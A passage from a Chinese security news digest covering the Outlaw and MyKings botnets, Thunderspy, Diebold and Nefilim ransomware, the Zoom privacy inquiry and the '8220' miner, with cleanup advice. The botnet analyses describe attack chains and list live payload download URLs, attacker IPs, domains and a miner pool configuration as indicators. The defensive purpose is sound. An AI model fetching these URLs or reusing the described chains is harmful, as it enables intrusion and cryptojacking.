安全快讯Top News

针对欧洲组织的新的僵尸网络 Outlaw 再度来袭

在我们的日常监控中,我们拦截了一个试图渗透客户网络的Linux恶意软件,该恶意软件是著的“ Shellbot ”,被定义为“ Outlaw Hacking Group”的犯罪工具。 早在2018年,TrendMicro首次发现“Outlaw Hacking Group”,该犯罪团伙主攻汽车和金融业,而Outlaw僵尸网通过暴力登录以及SSH漏洞(利用Shellshock Flaw和Drupalgeddon2漏洞)来实现对目标系统(包括服务器和IoT设备)的远程访问。其中,TrendMicro首次发现的版本还包含一个DDoS脚本,botmaster可以使用该脚的原有设置在暗网上提供的DDoS for-hire服务。 该恶意软件植入程序的主要组件是“Shellbot”变体,它是一个Monero矿机,与一个基于perl的后门捆绑在一起,包括一个基于IRC的bot和一个SSH扫描器。Shellbot自2005年被熟知,近期其出现在网络安全领域,使用的是全新的IRC服务器和全新的Monero pools,攻击目标针对全球组织。   更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1204/   消息来源:YOROI, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

威胁长期存在 黑客 5 分钟即可破解 Thunderbolt

你的电脑很可能又被黑客盯上了。近日,据外媒报道,一名荷兰研究人员 Ruytenberg 展示了黑客如何通过 Thunderbolt 实施物理访问进而攻击电脑,并指出了 7 类漏洞 : 固件验证方案不足 弱设备认证方案 未经验证的设备元数据的使用 使用向后兼容性降低攻击级别 未经验证的控制器配置的使用 SPI 闪存接口缺陷 在 Boot 营地没有雷电安全 研究者指出,这些漏洞适用于自 2011年以来所有装有 Thunderbolt 的计算机,并且允许拥有物理访问权限的攻击者从加密的驱动器和内存中快速窃取数据。 更可怕的是,即便你的设备即使处于睡眠模式或锁定的状态、设置安全引导、使用强 BIOS 和操作系统帐户密码以及启用完全磁盘加密,攻击仍然有效,并且这种攻击不会留下任何痕迹,也不需要任何形式的网络钓鱼,还可以从加密驱动器中窃取数据,而完成这一过程只需要 5 分钟。 研究人员将这一漏洞命名为 Thunderspy。值得注意的是,这是个硬件级漏洞,只要几百美元的设备就能攻破该漏洞。 在 Mac 电脑和部分 Windows 电脑上,Thunderbolt 端口能够被用来连接外围设备,比如显示器、高速网络适配器、普通硬盘和容量更大的存储阵列。在笔记本电脑上,一个 Thunderbolt 插接站就可以让你的电脑接入闪存读卡器、电源电缆、HDMI 显示器、以太网以及 USB 鼠标和键盘。 但一直以来,Thunderbolt 有一个让安全研究人员都很担心的问题:因其更快的数据传输速度,并且允许比其他端口更直接地访问计算机内存,所以导致漏洞的风险也更大。 3 个月前,Ruytenberg 向英特尔报告了这一漏洞,经核查,英特尔承认了这一漏洞。 英特尔表示:“虽然潜在的漏洞并不是新出现的,而且在去年的操作系统发布版中就已经解决了,但是研究人员在没有启用这些缓解措施的系统上使用定制的外围设备,演示了新的潜在物理攻击载体。 但他们并没有证明 DMA 攻击能够成功地攻击启用了这些缓解措施的系统。对于所有系统,我们建议遵循标准的安全实践,包括只使用受信任的外围设备和防止未经授权的物理访问计算机。英特尔将继续改进 Thunderbolt 技术的安全性,感谢来自埃因霍芬理工大学的研究人员向我们报告了这一情况。” 不过,Ruytenberg 有不同的看法,因为在实验中,他们没有发现任何一台戴尔电脑安装了上述保护措施,只有部分惠普和联想笔记本安装了。 此外,这些漏洞也无法通过软件更新修复,因为它们本质上与硬件设计有关,即使用户在操作系统中调整了安全设置,也不能完全避免此类攻击,所以只能靠今后重新设计硬件才能完全解决。 也就是说,目前还无法解决这个威胁。黑客如何在无密码解锁的情况下攻入你的电脑的? 为了进一步证明这个漏洞的影响,Ruytenberg 在 youtub 上传了一段分析视频 详情请见:https://www.youtube.com/watch?v=3byNNUReyvE 在演示视频中,他卸下了电脑的后盖,将 SPI 编程器和主板上的雷电控制器连接起来。 然后在另一台电脑上的雷电接口上插入一个自制破解设备,运行 PCI Leech 软件(一种内核插入和攻击工具),通过改变控制 Thunderbolt 端口的固件,允许任何设备访问,而整个过程只用了 5 分钟。 这样一来,攻击者可以永久禁用 Thunderbolt 安全并阻止所有未来的固件更新。该攻击只需要价值约 400 美元的装备,包括一个 SPI 编码器和价值 200 美元的 Thunderbolt 外设。当然,除了上面要拆开笔记本的方法外,Thunderspy 攻击还有一种无需物理侵入的方法。即通过创建任意的雷电设备身份,克隆用户授权的雷电设备,最后获得 PCIe 连接以执行 DMA 攻击。 这样,无需打开电脑外壳,即可绕过目标设备的锁定屏幕。但是,只有将雷电接口的安全性设置为允许受信任设备的默认设置时,这种无需物理侵入的 Thunderspy 攻击才有效。 目前,英特尔尚未发布任何 Thunderspy 漏洞的 CVE 信息,并且不计划发布针对市场上已有系统的修复程序。苹果则决定不为 Thunderspy 提供修复程序。 所以,对于用户来说,怎样保护电脑不被黑客攻击呢?安全研究人员也给出了一些建议。 通过免费的开源工具 Spycheck,验证是否受到 Thunderspy 的攻击: 验证地址:https://thunderspy.io/ 只连接自己的 Thunderbolt 外设;不要把它们借给任何人; 避免开机时无人值守系统,即使屏幕被锁定; 避免让 Thunderbolt 外设无人看管; 存储系统和任何 Thunderbolt 设备(包括 Thunderbolt 供电的显示器)时,确保适当的物理安全; 避免使用睡眠模式(内存挂起)。   (稿源:雷锋网,封面源自网络。)

美国最大 ATM 供应商遭勒索软件攻击

美国最大 ATM 供应商 Diebold Nixdorf 遭勒索软件攻击。该公司表示黑客未能接触 ATM 或客户网络,只影响其企业网络。Diebold 有 3.5 万名员工,其 ATM 机器在全球的市场占有率估计为 35%,它还生产零售商使用的销售终端系统和软件。 攻击发生在 4 月 25 日晚上,安全团队探测到企业网络的异常行为,它立即采取行动隔离网络中的系统,阻止恶意程序扩散。该公司表示勒索软件没有影响到它的客户网络。入侵 Diebold 企业网络的是被称为 ProLock 的勒索软件。Diebold 称它没有向攻击者支付赎金。安全专家表示这么做也许更好,因为当前版本的 ProLock 解密工具会损坏数据库之类的大型文件。   (稿源:solidot,封面源自网络。)

美 FTC 证实正在调查视频会议软件公司 Zoom 侵犯隐私问题

5月12日消息,据国外媒体报道,受新冠疫情影响,视频会议需求大增,而其中最大的受益者包括视频会议软件公司Zoom。虽然,该公司目前风头正盛,但它也被曝光了很多问题,比如侵犯隐私问题。 加州众议员杰里·麦克纳尼(Jerry McNerney)和其他人对收集到的关于注册用户和非注册用户的信息、Zoom用户可能存储在云中的通信记录表达了担忧。 当地时间周一,美国联邦贸易委员会(FTC)主席约瑟夫·西蒙斯(Joseph Simons)表示,该机构正在调查有关Zoom的隐私投诉问题。 除了隐私问题外,Zoom还存在一些其它的负面新闻,比如,谷歌以担心安全性为由,禁止员工在电脑上安装和使用Zoom,超50万Zoom账户信息在暗网售卖等等。 随着视频会议需求大增,Zoom的用户人数也迅速增长。此前,该公司宣布,它已拥有3亿日活跃用户,较4月初的2亿活跃用户增长约50%。但后来,该公司又纠正了具有误导性的说法,承认自己并没有3亿日活跃用户,而是“每天有3亿个Zoom会议参与者”。 此外,由于视频会议需求大增,Zoom选择甲骨文作为其关键的云基础设施提供商,以增加其云计算能力。   (稿源:网易科技,封面源自网络。)

Mykings 僵尸网络更新基础设施,大量使用 PowerShell 脚本进行“无文件”攻击挖矿

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/Eyqm-lgQovFaJnk3FHihJQ 一、概述 MyKings僵尸网络2017年2月左右开始出现,该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括DDoS、Proxy(代理服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强,影响范围较广,对企业用户危害严重。 Mykings僵尸网络本轮活动主要更新点 1.新增IP、域名、URL; 2.大量采用POWERSHELL脚本进行“无文件”落地攻击; 3.在清理竞争对手挖矿木马名单中增加了“新冠”挖矿木马; 4.使用挖矿账号登陆,隐藏了钱包地址; 5.新增白利用文件; 6.不同系统版本执行脚本不同; 7.获取windows登陆密码 攻击流程图 二、解决方案 运维人员可参考以下方法手动清除Windows系统感染的挖矿木马,企业用户亦可使用腾讯T-Sec终端安全管理系统(腾讯御点)查杀病毒,参考安全建议提升服务器的安全性。 删除以下病毒文件: C:\Windows\debug\lsmose.exe C:\Windows\debug\lsmos.exe C:\Windows\debug\lsmo.exe C:\Program Files (x86)\Common Files\csrw.exe C:\Progra~1\Common Files\csrw.exe c:\windows\help\lsmosee.exe c:\windows\help\akpls.exe c:\windows\inf\lsmma.exe c:\windows\inf\lsmm.exe c:\windows\inf\lsmmaa.exe c:\windows\system32\new.exe c:\windows\system32\upsupx.exe c:\windows\inf\aspnet\lsma.exe c:\windows\inf\aspnet\lsmab.exe c:\windows\inf\aspnet\lsmaaa.exe c:\windows\inf\aspnet\lsma30.exe c:\windows\inf\aspnet\lsma31.exe c:\\windows\java\java.exe c:\windows\inf\aspnet\lsma12.exe c:\windows\debug\ok.dat c:\windows\debug\item.dat c:\windows\update.exe c:\windows\temp\servtestdos.dll C:\WINDOWS\Fonts\cd c:\windows\help\get.exe c:\windows\inf\aspnet\u.exe c:\windows\inf\winnts.exe c:\windows\temp\svchost.exe c:\windows\temp\conhost1.exe 删除病毒添加的计划任务 Mysa Mysa1 Mysa2 Mysa3 ok oka 删除病毒添加的WMI事件启动项 fuckyoumm2_filter fuckyoumm2_consumer Windows Events Filter Windows Events Consumer4 Windows Events Consumer fuckayoumm3 fuckayoumm4 安全建议 1.Mysql端口非必要情况不要暴露在公网,使用足够强壮的Mysql口令; 2.修复MS010-17“永恒之蓝”漏洞,服务器暂时关闭不必要的端口(如135、139、445)。 三、详细分析 mykings本次活动通过mssql爆破手段攻击windows服务器,根据系统版本下发不同的脚本。 WIN10以下主要是对windows defender有关闭操作,并且会使用mimikatz导出windows密码。各系统对应的脚本下载链接: Windows 10,http://173.208.139.170:8170/win10.txt Windows 服务器,http://173.208.139.170:8170/sa.xsl Windows xp,http://173.208.139.170:8170/s.xsl Win Vista~Win8,http://173.208.139.170:8170/abc.txt 脚本入口处搜集IP,进程,内存,处理器信息,上传到FTP 接着下载batpower.txt Batpower首先下载kill.txt,主要作用是清理自身旧版本挖矿程序,以固定阵地,删除相应文件: 清理wmi启动项 下载uninstall.txt,卸载多款主流杀毒软件: 之后去ftp服务器下载三个挖矿木马文件,并设置成计划任务: 下载并设置v.sct开机启动,目前无法连接,具体功能暂时无法得知 继续下载执行wmi.txt,主要设置开机下载执行power.txt,s.txt Power.txt及s.txt有多个地址可供下载 Power.txt功能与batpower.txt功能一样。 s.txt会去下载hxxp://173.208.153.130:8130/wpd.rar,这是一个自解压文件,主要功能是清除竞争对手挖矿木马,如:NSABuffMiner、kingminer,还有最新的“新冠”挖矿木马 “coronav2“。 后下载执行hxxp://167.88.180.175:8175/download.txt,里面也会执行挖矿木马。 链接中的g.exe是pplive的loader模块,用做白利用,以下载并执行其他病毒模块。 该模块会根据命令行下载执行文件,不会做任何验证。 u.exe首先获取mirai僵尸网络下载IP 再获取更新地址: 扫描工具msinfo,并对公网和内网进行扫描攻击,包括使用永恒之蓝漏洞、SQL爆破、Telnet爆破、RDP爆破等多种手段: Mirai携带的永恒之蓝攻击模块 max.exe则是暗云Ⅲ木马,攻击流程无变化。 暗云Ⅲ的更新域名及下载链接 1201.exe是基于xmrig 2.0.4版本修改而来,矿机配置存放在资源段TXT中 “url”: “69.197.156.194:80”, “user”: “abc443”, “pass”: “x”, “url”: “win443.xmrpool.ru:443”, “user”: “abcd1443”, “pass”: “x”, 附录 IOCs MD5 74a09ef83de2599529c9a6f0278fdb60 9f86afae88b2d807a71f442891dfe3d4 929c393fcfb72f9af56ce34df88f82bb 539d218039ad0a2c6bf541af95a013bc a8c98125b9d04673f079bcc717e58a71 5364fae1de8db8fa3faf07bfaf2b706f b150d411a1e29e43b6423f19db4fd3ed 94d5e03b2d21f8f0c6d963570ecba6c1 5d461acc19ac7d2a993ddf0d8866cb1a 93515e391ac22a065279cadd8551d2bc bc7fc83ce9762eb97dc28ed1b79a0a10 d9c32681d65c18d9955f5db42154a0f3 f89cbaf4dbe490787adf5eeb9304d785 44ac832c2b71b4874e544e2b04a72834 6d0bb14c2f5a384bd5073a45db12dabe fa74df0a9a42d29018146520ae0b5585 9459494db3750da9fab3d9deaf4d1106 598ba6f7a900a78666bcb9774620f643 2293f46b3c293e5c637343447e582fdb 8e8f427d93e809137283abfad825b33d b6c1dacca555c61a26907296a04d10de a1783a56738b17ba117b5518399748b0 64ce5ad470cfa503882a3dfac382c6b4 a26ba601674371229eab93a585a79e6b 5c56774156b5fefe2e465b4546006f9a 61e1f73f2e8f566f959e3ffca120aa8b a8557ea0f4034ecf855087e3200354ac 2da63739662c5ea7231c930b61f73a72 5e87427c66ecb84a85700b1180d115f2 f18e88259b1043a6e06c9a16d4c0475e 1a7dcb9970287539774c7ade1cb7e483 e827621c5185488122da57ac16d1fca0 795dd160e8073d23f5c6954602bf3b89 a5b75dfb3b3358ad1a2ef8025ddebb29 cfa550296b848293f912fd625c114015 IP 208.110.71.194 80.85.152.247 66.117.2.182 70.39.124.70 150.107.76.227 103.213.246.23 103.106.250.161 103.106.250.162 144.208.127.215 167.88.180.175 172.83.155.170 173.208.133.114 173.208.153.130 173.247.239.186 192.236.160.237 199.168.100.74 23.236.69.114 74.222.14.97 66.117.6.174 DOMAIN www.upme0611.info mbr.kill0604.ru js.ftp1202.site wmi.1103bye.xyz ok.xmr6b.ru URL hxxp://167.88.180.175:8175/kill.txt hxxp://js.ftp1202.site:280/v.sct hxxp://167.88.180.175:8175/wmi.txt hxxp://173.208.153.130:8130/wpd.rar hxxp://167.88.180.175:8175/download.txt hxxp://js.ftp1202.site:280/v.sct hxxp://wmi.1103bye.xyz:8080/power.txt hxxp://172.83.155.170:8170/power.txt hxxp://192.236.160.237:8237/power.txt hxxp://144.208.127.215:8215/power.txt hxxp://103.106.250.161:8161/power.txt hxxp://103.106.250.162:8162/power.txt hxxp://144.208.127.215:8215/s.txt hxxp://103.106.250.161:8161/s.txt hxxp://172.83.155.170:8170/s.txt hxxp://192.236.160.237:8237/s.txt hxxp://103.106.250.162:8162/s.txt hxxp://wmi.1103bye.xyz:8080/s.txt hxxp://144.208.127.215:8215/s.txt hxxp://103.106.250.161:8161/s.txt hxxp://172.83.155.170:8170/s.txt hxxp://192.236.160.237:8237/s.txt hxxp://103.106.250.162:8162/s.txt hxxp://wmi.1103bye.xyz:8080/s.txt hxxp://173.247.239.186:8186/g.exe hxxp://173.247.239.186:8186/u.exe hxxp://199.168.100.74:8074/max.exe hxxp://199.168.100.74:8074/1201.rar hxxp://23.236.69.114:8114/dll/64npf.sys hxxp://23.236.69.114:8114/update.txt hxxp://23.236.69.114/ups.html hxxp://23.236.69.114:8114/dll/wpcap.dll hxxp://23.236.69.114:8114/dll/packet.dll hxxp://23.236.69.114:8114/dll/npptools.dll hxxp://173.208.133.114:8114/upsupx.exe hxxp://www.upme0611.info/address.txt hxxp://mbr.kill0604.ru/cloud.txt hxxp://74.222.14.97/xpxmr.dat hxxp://ok.xmr6b.ru/xpxmr.dat hxxp://ok.xmr6b.ru/ok/wpd.html hxxp://66.117.6.174/wpdmd5.txt hxxp://66.117.6.174/wpdtest.dat hxxp://66.117.6.174/ver.txt hxxp://66.117.6.174/shellver.txt hxxp://66.117.6.174/csrs.exe hxxp://23.236.69.114:8114/ups.html hxxp://66.117.6.174:8114/update.txt hxxp://66.117.6.174/wpd.jpg hxxp://66.117.6.174/my1.html hxxp://172.83.155.170:280/v.sct hxxp://139.5.177.19:8019/blue.txt 参考链接 https://s.tencent.com/research/report/622.html https://mp.weixin.qq.com/s/KdeF1eaM-Dq1z_wOIb9_oA https://www.freebuf.com/column/187489.html

NEMTY 的继任者——Nefilim/Nephilim 勒索软件

现在是一个研究跟踪勒索软件趋势的有趣时机,特别是在过去的一两年里,我们已经看到“主流”勒索软件甚至进一步扩展到了数据勒索和盗窃领域。对文件进行加密是一回事,但必须将每一个勒索软件感染都视为违规行为,这给这些攻击活动的受害者增加了多层复杂性。对于GDPR以及现在类似法律和合规性障碍,这尤其复杂。 勒索软件家族,如Maze、CLOP、DoppelPaymer、Sekhmet和Nefilim/Nephilim都是威胁的案例,一旦感染,就会给受害者带来相当复杂的问题。虽然Maze、DopplePayer和REvil往往会得到大量媒体报道,但Nephilim是另一个迅速发展的家族,它发起了多起破坏性活动。如果受害者不能“配合”他们的要求,他们就会公布受害者的敏感信息。   概述 Nefilim出现于2020年3月,与另一个勒索软件家族NEMTY共享相当一部分代码。NEMTY和Nefilim/Nephilim背后的确切关系尚不清楚。 NEMTY于2019年8月作为一个公共项目推出,之后转为私有。目前的数据表明,在这两个家族背后的不是同一个人,更有可能的是,Nephilim背后的人以某种方式从NEMTY那里“获得”了必要的代码。 Nefilim和NEMTY的两个主要区别是支付模式,以及缺少RaaS操作。Nefilim指示受害者通过电子邮件与攻击者联系,而不是将他们引导到基于torm的支付网站。为了使家谱更加混乱,Nefilim似乎演变为了“Nephilim”,两者在技术上相似,主要区别在于扩展名和加密文件中的工件。 然而,也有情报表明,NEMTY已经继续并分支到一个新的“NEMTY Revenue”版本。在此之前,NEMTY的幕后主使宣布他们将把威胁私有化(不再公开访问RaaS行动)。 从技术上讲,Nephilim与其他著名的勒索软件家族没有什么不同。目前主要的传播方法是利用易受攻击的RDP服务。一旦攻击者通过RDP破坏了环境,他们就会继续建立持久性,在可能的情况下查找和窃取其他凭证,然后将勒索软件的payload传播给潜在目标。   Nephilim加密协议 在Nephilim样本中我们分析了实际的文件加密是通过标签组AES-128和RSA-2048处理的。注意,Nefilim/Nephilim背后的原始供应商也这样做。 特定的文件使用AES-128加密。此时,使用RSA-2048公钥加密AES加密密钥。公钥随后被嵌入到勒索软件的可执行payload中。这是一个不同于纯NEMTY的区域,后者已知使用了不同的密钥长度。例如,早期版本的NEMTY使用RSA-8192作为“主密钥”,用于加密目标配置数据和其他密钥(src: Acronis)。 我们还知道NEMTY的变体使用RSA-1024公钥来处理AES加密密钥。此外,在早期版本的NEMTY中,处理特定大小范围的文件的方式也存在差异。NEMTY的后续版本(又名NEMTY REVENUE 3.1)在计数器模式下利用AES-128和RSA-2048加密AES密钥。 目前,只有Nephilim背后的参与者能够解密受影响的文件。也就是说,没有已知的漏洞或方法来绕过攻击者对加密文件的保护。   感染后的行为 感染后,加密文件的扩展名为.nefilim或.Nephilim。在包含加密文件的目录中存放着类似的名为ransom的记录。 在某些情况下,对于Nephilim,“nephilm – decrypt.txt”将只写入~\AppData\Local\VirtualStore。本地存储的桌面壁纸的位置和名称各不相同。在最近的Nephilim感染中,备用桌面映像被写入%temp%,文件名为’ god.jpg ‘。   字符串,区别特征 Nephilim的另一个特点是使用嵌入的字符串和编译器路径来发送“微妙的信息”,主要是向研究人员和分析人员发送。例如,以下编译器路径可以在这些示例中找到(均在2020年4月7日编译): b8066b7ec376bc5928d78693d236dbf47414571df05f818a43fb5f52136e8f2e fcc2921020690a58c60eba35df885e575669e9803212f7791d7e1956f9bf8020 而样本为: d4492a9eb36f87a9b3156b59052ebaf10e264d5d1ce4c015a6b0d205614e58e3 从2020年3月开始包含对特定AV厂商的额外攻击。 该样本来源于@malwrhunterteam 在3月13号的推文。 羞辱策略 Nefilim/Nephilim还威胁说,如果受害者拒绝配合要求,他们将公布敏感信息,这一点在这张典型的Nephilim勒索信中得到了证明。 受害者试图谈判或拒绝付款都属于不遵守规定的范畴。迄今为止,已有两家公司在Nephilim的“shaming”网站(clearnet和基于TOR的网站)上发布。值得注意的是,最初,其网站上列出的所有公司都是石油和能源公司。但是,在2020年4月23日至4月27日期间,该组织又在现场增加了三名受害者。其中一家是另一家大型石油和天然气公司,另外两家则被归类为“服装和时装”和“工程与建筑服务”。 其他多个勒索软件家族也遵循相同的做法,将“基本”勒索软件感染转变为完全(有时是灾难性的)数据泄露。使用该模型的其他知名家族包括Maze、REvil DoppelPaymer、CLOP、Sekhmet,以及最近的Ragnar。我们注意到,Nefilim/Nephilim也是“发誓”在当前新冠疫情大流行期间不攻击医疗实体、非营利组织和其他“关键”实体的家族之一。 结论 保护你的环境免受像Nephilim这样的威胁比以往任何时候都更加重要。为了防止数据丢失和大规模数据泄露的后果,企业必须依赖于一个现代的、受良好维护的、适当调整的、受信任的安全解决方案。预防是这些攻击的关键。即使可以通过解密器、备份或回滚来减轻加密/数据丢失的情况,受害者仍然面临其数据公开发布的问题。我们鼓励我们的客户分析和理解威胁,并采取迅速而适当的行动以防止事故发生。 为了方便起见,我们在下面提供了SHA256和SHA1哈希。 SHA256 8be1c54a1a4d07c84b7454e789a26f04a30ca09933b41475423167e232abea2b b8066b7ec376bc5928d78693d236dbf47414571df05f818a43fb5f52136e8f2e 3080b45bab3f804a297ec6d8f407ae762782fa092164f8ed4e106b1ee7e24953 7de8ca88e240fb905fc2e8fd5db6c5af82d8e21556f0ae36d055f623128c3377 b227fa0485e34511627a8a4a7d3f1abb6231517be62d022916273b7a51b80a17 3bac058dbea51f52ce154fed0325fd835f35c1cd521462ce048b41c9b099e1e5 353ee5805bc5c7a98fb5d522b15743055484dc47144535628d102a4098532cd5 5ab834f599c6ad35fcd0a168d93c52c399c6de7d1c20f33e25cb1fdb25aec9c6 52e25bdd600695cfed0d4ee3aca4f121bfebf0de889593e6ba06282845cf39ea 35a0bced28fd345f3ebfb37b6f9a20cc3ab36ab168e079498f3adb25b41e156f 7a73032ece59af3316c4a64490344ee111e4cb06aaf00b4a96c10adfdd655599 08c7dfde13ade4b13350ae290616d7c2f4a87cbeac9a3886e90a175ee40fb641 D4492a9eb36f87a9b3156b59052ebaf10e264d5d1ce4c015a6b0d205614e58e3 B8066b7ec376bc5928d78693d236dbf47414571df05f818a43fb5f52136e8f2e fcc2921020690a58c60eba35df885e575669e9803212f7791d7e1956f9bf8020 SHA1 4595cdd47b63a4ae256ed22590311f388bc7a2d8 1f594456d88591d3a88e1cdd4e93c6c4e59b746c 6c9ae388fa5d723a458de0d2bea3eb63bc921af7 9770fb41be1af0e8c9e1a69b8f92f2a3a5ca9b1a e99460b4e8759909d3bd4e385d7e3f9b67aa1242 e53d4b589f5c5ef6afd23299550f70c69bc2fe1c c61f2cdb0faf31120e33e023b7b923b01bc97fbf 0d339d08a546591aab246f3cf799f3e2aaee3889 bbcb2354ef001f476025635741a6caa00818cbe7 2483dc7273b8004ecc0403fbb25d8972470c4ee4 d87847810db8af546698e47653452dcd089c113e E94089137a41fd95c790f88cc9b57c2b4d5625ba Bd59d7c734ca2f9cbaf7f12bc851f7dce94955d4 f246984193c927414e543d936d1fb643a2dff77b d87847810db8af546698e47653452dcd089c113e     消息来源:SentinelLABS, 译者:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

2019 年之前生产的任何 PC 都易受到“Thunderspy”攻击

埃因霍温科技大学的安全研究员 Björn Ruytenberg 透露,由于常用的 Thunderbolt 端口存在缺陷,2019 年之前生产的所有 PC 都可能遭到黑客入侵。 即使 PC 处于睡眠模式或处于锁定状态,这一被称为 Thunderbspy 的攻击也可以从用户的 PC 读取和复制所有数据。此外,它还可以从加密驱动器中窃取数据。 Thunderspy 属于 evil-maid 攻击类别,这意味着它需要对设备进行物理访问才能对其进行攻击,因此与可以远程执行的其他攻击相比,它的利用程度较低。但是另一方面,Thunderspy 还是一种隐身攻击,在成功执行入侵之后,犯罪分子几乎不会留下任何利用的痕迹。 事实上,早在 2019 年 2 月,一群安全研究人员就发现了一个与 Thunderspy 类似的相关入侵事件 Thunderclap。同年,英特尔发布了一种可以防止 Thunderspy 攻击的安全机制,称为内核 DMA 保护(Kernel Direct Memory Access Protection)。 不过该机制在较早的配置中未实现,这也就是在 2019 年之前生产的计算机更易受到影响的原因。但有趣的是,当苹果 MacOS 笔记本启动到 Bootcamp 时,所有的 Thunderbolt 安全都会被禁用。 Ruytenberg 指出,所有在 2011-2020 年之间出货的、配备 Thunderbolt 的设备都容易受到攻击。自 2019 年以来已交付的提供内核 DMA 保护的设备,也都在一定程度上易受攻击。 Thunderspy 漏洞无法在软件中修复,会影响到未来的 USB 4 和 Thunderbolt 4 等标准,最终将需要对芯片进行重新设计。     (稿源:开源中国,封面源自网络。)

“8220”挖矿木马入侵服务器挖矿,组建“海啸”僵尸网络,预备发起DDoS攻击

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/X0LeyXch6Bsa_2aF-cItXQ   一、背景 腾讯安全威胁情报中心检测到“8220”挖矿木马变种攻击。“8220”挖矿团伙擅长利用WebLogic、JBoss反序列化漏洞,Redis、Hadoop未授权访问漏洞等Web漏洞攻击服务器挖矿。近期我们发现该团伙在攻击活动中通过Apache Struts远程代码执行漏洞(CVE-2017-5638)、Tomcat弱口令爆破进行传播的木马大幅增加。 木马在横向移动阶段会利用Python实现的Redis未授权漏洞访问漏洞对随机生成的约16万个IP进行扫描攻击,并且利用植入的shell脚本hehe.sh继续利用已有公钥认证记录的机器建立SSH连接进行内网扩散,最终在失陷机器植入多款门罗币挖矿木马以及Tsunami僵尸网络木马,后者被该团伙用来进行DDoS攻击。 “8220”挖矿木马团伙的攻击目标包括Windows和Linux服务器,在其使用的FTP服务器上,可以发现针对不同操作系统的攻击模块。该团伙释放挖矿木马时,会检查服务器是否有其他挖矿木马运行,将所有竞争挖矿木马进程结束,以独占服务器资源。 根据代码的相似性、C2关联性、挖矿时使用的相同门罗币钱包以及配置文件解密方法、相似的FTP服务器,腾讯安全专家认为,2020年初出现的StartMiner与“8220”挖矿木马属于同一团伙。该团伙当前版本恶意程序与C2服务器的通信已不再使用“8220”端口,根据近期捕获到的样本对其攻击偏好使用的文件名进行总结,发现其具有使用多种脚本包括VBS、PHP、Python、Powershell、Shell进行组合攻击的特点。 二、解决方案 企业运维人员可参考以下方法手动清除Linux和Windows系统感染的挖矿木马,参考安全建议提升服务器的安全性。 Linux系统 a. Kill进程/tmp/sh、/tmp/x32b、/tmp/x64b b. 删除文件 /tmp/i686(md5: D4AE941C505EE53E344FB4D4C2E102B7)、 /tmp/ x86_64(md5: 9FE932AC3055045A46D44997A4C6D481) /tmp/x32b(md5: EE48AA6068988649E41FEBFA0E3B2169)、 /tmp/x64b(md5: C4D44EED4916675DD408FF0B3562FB1F) c.  删除包含“www.jukesxdbrxd.xyz”、“107.189.11.170”的crontab计划任务 安全建议: a. Redis 非必要情况不要暴露在公网,使用足够强壮的Redis口令 b. Tomcat服务器配置高强度密码认证 c.  设置ssh非交互方式登录时StrictHostKeyChecking=ask或StrictHostKeyChecking=yes Windows系统 a. 杀死进程isassx.exe、steamhuby.exe、issaasss、isasss.exe、ready.exe、oity.exe、kkw2.exe、12.exe、13.exe、mess.exe b. 删除文件: c:\windows\temp\app.vbs c:\windows\temp\apps.vbs C:\Windows\Temp\ready.exe C:\ProgramData\guvpgnkpwv\steamhuby.exe C:\ProgramData\tumtkffywq\issaasss C:\Windows\temp\12.exe C:\Windows\temp\12.exe C:\Windows\Temp\mess.exe %HOMEPATH%\why.ps1 %HOMEPATH%\schtasks.ps1 c.  删除执行内容包含“why.ps1、why2.ps1、why3.ps1、kkmswx.ps1”的计划任务 安全建议: 及时修复Apache Struts高危漏洞; Tomcat服务器配置高强度密码认证。 推荐政府机构、大中型企业、科研单位采用腾讯安全完整解决方案全面提升信息系统的安全性。 腾讯安全解决方案部署示意图(图片可放大) 政企用户可根据业务应用场景部署适当的安全产品,并根据腾讯安全威胁情报中心提供的情报数据配置各节点联防联动、统一协调管理,提升整体网络抗攻击能力。 腾讯安全系列产品应对8220挖矿木马的响应清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)8220挖矿木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)8220挖矿木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞相关联的IOCs已支持识别检测; 2)支持下发访问控制规则封禁目标端口,主动拦截Redis未授权访问漏洞相关访问流量。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持Apache Struts远程命令执行漏洞、Redis未授权访问漏洞的检测; 2)已支持查杀8220挖矿木马家族样本。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 网络资产风险监测系统 (腾讯御知) 1)腾讯御知已支持监测全网资产是否受Apache Struts远程命令执行漏洞、Redis未授权访问漏洞影响。 关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://s.tencent.com/product/narms/index.html 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞相关联的IOCs已支持识别检测; 2)对利用Apache 